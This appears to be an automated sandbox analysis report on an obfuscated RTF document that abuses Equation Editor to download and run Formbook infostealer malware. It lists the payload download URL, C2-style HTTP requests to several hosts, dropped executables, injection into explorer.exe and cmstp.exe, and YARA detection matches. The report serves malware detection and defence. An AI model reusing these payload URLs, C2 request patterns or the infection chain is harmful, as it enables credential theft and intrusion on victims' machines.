          Source: EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC:
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: explorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{549C67C8-FC54-4D4D-BB29-D3A79D220C79}.tmp
          Source: unknown | DNS traffic detected: queries for: swamini.in
          Source: C:\Windows\explorer.exe | Code function: 8_2_08CA6F82 getaddrinfo,setsockopt,recv
          Source: global traffic | HTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: swamini.in
          Source: global traffic | HTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: swamini.in | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf HTTP/1.1 | Host: www.shucaimh.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== HTTP/1.1 | Host: www.6061k.vip | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1 | Host: www.xazeyu.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (this identical request was logged 7 times)
          Source: unknown | Network traffic detected: HTTP traffic on port 49162 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49162
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Tue, 21 Nov 2023 12:27:15 GMT | Content-Type: text/html | Content-Length: 291 | Connection: close | ETag: "6552b2aa-123" | Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknown | HTTPS traffic detected: 103.224.247.210:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud

          Source: Yara match | File source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | Author: ditekSHen
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.881171114.0000000008CBE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d | Author: unknown
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: twbcaze.exe PID: 3164, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: twbcaze.exe PID: 3172, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: cmstp.exe PID: 3216, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\balokarat2.1[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004047D3
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004061D4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_00416260
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_00421208
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_00416BCD
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_00410BF0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_002308B7
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_00230A2D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041E1CF
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041EB5A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041E42B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041E54B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041ED50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041D563
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041D566
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0041DD6E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00409E4D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0084E0C6
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0084E2E9
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008F63BF
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008763DB
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00852305
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0089A37B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008D443E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008D05E3
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0086C5F0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00896540
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00854680
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0085E6C1
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008F2622
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0089A634
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0085C7BC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0085C85C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0087286D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008F098E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008529B2
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008669FE
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008E49F5
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0089C920
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008FCBA4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008D6BCB
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008F2C9C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_008DAC5E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_00880D3B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 7_2_0085CD5B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00882E2F7_2_00882E2F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0086EE4C7_2_0086EE4C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008ECFB17_2_008ECFB1
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008C2FDC7_2_008C2FDC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00860F3F7_2_00860F3F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0087D0057_2_0087D005
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008530407_2_00853040
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0086905A7_2_0086905A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008CD06D7_2_008CD06D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008DD13F7_2_008DD13F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F12387_2_008F1238
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084F3CF7_2_0084F3CF
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008573537_2_00857353
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008854857_2_00885485
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008614897_2_00861489
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0088D47D7_2_0088D47D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F35DA7_2_008F35DA
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0085351F7_2_0085351F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D579A7_2_008D579A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008857C37_2_008857C3
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008E771D7_2_008E771D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008CF8C47_2_008CF8C4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008EF8EE7_2_008EF8EE
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D394B7_2_008D394B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D59557_2_008D5955
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00903A837_2_00903A83
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084FBD77_2_0084FBD7
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008DDBDA7_2_008DDBDA
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00877B007_2_00877B00
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008EFDDD7_2_008EFDDD
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008DBF147_2_008DBF14
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0087DF7C7_2_0087DF7C
          Source: C:\Windows\explorer.exeCode function: 8_2_081880368_2_08188036
          Source: C:\Windows\explorer.exeCode function: 8_2_0817F0828_2_0817F082
          Source: C:\Windows\explorer.exeCode function: 8_2_081869128_2_08186912
          Source: C:\Windows\explorer.exeCode function: 8_2_08180D028_2_08180D02
          Source: C:\Windows\explorer.exeCode function: 8_2_0818C5CD8_2_0818C5CD
          Source: C:\Windows\explorer.exeCode function: 8_2_081892328_2_08189232
          Source: C:\Windows\explorer.exeCode function: 8_2_08183B308_2_08183B30
          Source: C:\Windows\explorer.exeCode function: 8_2_08183B328_2_08183B32
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA62328_2_08CA6232
          Source: C:\Windows\explorer.exeCode function: 8_2_08C9C0828_2_08C9C082
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA50368_2_08CA5036
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA95CD8_2_08CA95CD
          Source: C:\Windows\explorer.exeCode function: 8_2_08C9DD028_2_08C9DD02
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA39128_2_08CA3912
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA0B328_2_08CA0B32
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA0B308_2_08CA0B30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECE0C69_2_01ECE0C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EF63DB9_2_01EF63DB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F763BF9_2_01F763BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F1A37B9_2_01F1A37B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED23059_2_01ED2305
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECE2E99_2_01ECE2E9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F505E39_2_01F505E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EEC5F09_2_01EEC5F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F165409_2_01F16540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5443E9_2_01F5443E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDC7BC9_2_01EDC7BC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDE6C19_2_01EDE6C1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED46809_2_01ED4680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F1A6349_2_01F1A634
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F726229_2_01F72622
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F649F59_2_01F649F5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE69FE9_2_01EE69FE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED29B29_2_01ED29B2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F7098E9_2_01F7098E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F1C9209_2_01F1C920
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EF286D9_2_01EF286D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDC85C9_2_01EDC85C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F56BCB9_2_01F56BCB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F7CBA49_2_01F7CBA4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDCD5B9_2_01EDCD5B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F00D3B9_2_01F00D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F72C9C9_2_01F72C9C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5AC5E9_2_01F5AC5E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F42FDC9_2_01F42FDC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6CFB19_2_01F6CFB1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE0F3F9_2_01EE0F3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EEEE4C9_2_01EEEE4C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F02E2F9_2_01F02E2F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5D13F9_2_01F5D13F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F4D06D9_2_01F4D06D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED30409_2_01ED3040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE905A9_2_01EE905A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EFD0059_2_01EFD005
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECF3CF9_2_01ECF3CF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED73539_2_01ED7353
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F712389_2_01F71238
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F735DA9_2_01F735DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED351F9_2_01ED351F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE14899_2_01EE1489
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F054859_2_01F05485
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F0D47D9_2_01F0D47D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F057C39_2_01F057C3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5579A9_2_01F5579A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6771D9_2_01F6771D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F559559_2_01F55955
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5394B9_2_01F5394B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6F8EE9_2_01F6F8EE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F4F8C49_2_01F4F8C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5DBDA9_2_01F5DBDA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECFBD79_2_01ECFBD7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EF7B009_2_01EF7B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F83A839_2_01F83A83
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6FDDD9_2_01F6FDDD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EFDF7C9_2_01EFDF7C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5BF149_2_01F5BF14
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AE54B9_2_000AE54B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AD5669_2_000AD566
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AEB5A9_2_000AEB5A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AED509_2_000AED50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00092D909_2_00092D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00099E4D9_2_00099E4D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00099E509_2_00099E50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00092FB09_2_00092FB0
          Source: C:\Windows\SysWOW64\cmstp.exe Process Stats: CPU usage > 49%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 771D0000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe Memory allocated: 771D0000 page execute and read and write
